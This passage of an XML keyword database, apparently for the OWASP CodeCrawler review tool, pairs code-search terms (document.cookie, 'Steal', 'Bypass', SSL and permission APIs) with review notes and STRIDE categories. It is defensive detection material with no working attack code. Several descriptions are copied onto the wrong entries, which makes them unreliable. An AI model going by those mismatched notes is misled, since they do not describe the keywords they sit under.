<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;layer&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Kludge</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Bypass</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Steal</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Stolen</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Divert</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Broke</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Trick</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Fix</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ToDo</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.write</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.cookie</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionalty as this would have a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>window.location</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>document.URL</k_name>
<k_level>2</k_level>
<k_description>Look for Ajax usage, and possible Javascript issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>window.createRequest</k_name>
<k_level>2</k_level>
<k_description>If this function is used with Java Ajax in client side such then such usage should be avoided</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getSession</k_name>
<k_level>2</k_level>
<k_description>Always be scared of the session management. Look at each session object within the application and ensure the level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>KeyManagerFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpsURLConnection</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>TrustManagerFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SSLSocketFactory</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SSLContext</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>com.sun.net.ssl</k_name>
<k_level>2</k_level>
<k_description>Looking for code which utilises SSL as a medium for point to point encryption. This fragment should indicate where SSL functionality has been developed.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Connection.prepareCall</k_name>
<k_level>2</k_level>
<k_description>Searching for Java Database related code this list should help you pinpoint classes/methods which are involved in the persistence layer of the application being reviewed</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>response.write</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks results from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.TotalBytes</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.IsSecureConnection</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.servervariables</k_name>
<k_level>2</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;%=</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks results from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpUtility</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks results from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>enableViewStateMac</k_name>
<k_level>2</k_level>
<k_description>It is important that many variables in machine.config can be overridden in the web.config file for a particular application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecureString</k_name>
<k_level>2</k_level>
<k_description>If storing sensitive data in memory recommend one uses the following.</k_description>
<link>http://www.owas.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Console.WriteLine</k_name>
<k_level>1</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determinate if any sensitive information is being logged. Common mistakes are logging userID in conjuction with passwords within the authentication functionality or logging database requests which may contains sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Reflection</k_name>
<k_level>1</k_level>
<k_description>
If Code that is generated dynamically (runtime) as a function of external input may give rise to the security issues. This means if your code contains sensitive data does it need to be serialized?
</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.SkipVerification</k_name>
<k_level>1</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>addCookie</k_name>
<k_level>1</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>debug</k_name>
<k_level>1</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>UrlEncode</k_name>
<k_level>1</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.UnmanagedCode</k_name>
<k_level>1</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HtmlEncode</k_name>
<k_level>1</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<!-- -->
<KeyPointer>
<k_name>void Write</k_name>
<k_level>1</k_level>
<k_description>Different programming languages use different terms to identify the fundamental managed types. Class library designers must avoid using language-specific terminology. Follow the rules described in this section to avoid type name confusion. Use names that describe a type's meaning rather than names that describe the type. In the rare case that a parameter has no semantic meaning beyond its type, use a generic name.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Sub Write</k_name>
<k_level>1</k_level>
<k_description>Different programming languages use different terms to identify the fundamental managed types. Class library designers must avoid using language-specific terminology. Follow the rules described in this section to avoid type name confusion. Use names that describe a type's meaning rather than names that describe the type. In the rare case that a parameter has no semantic meaning beyond its type, use a generic name.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
</CodeCrawlerDatabase>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment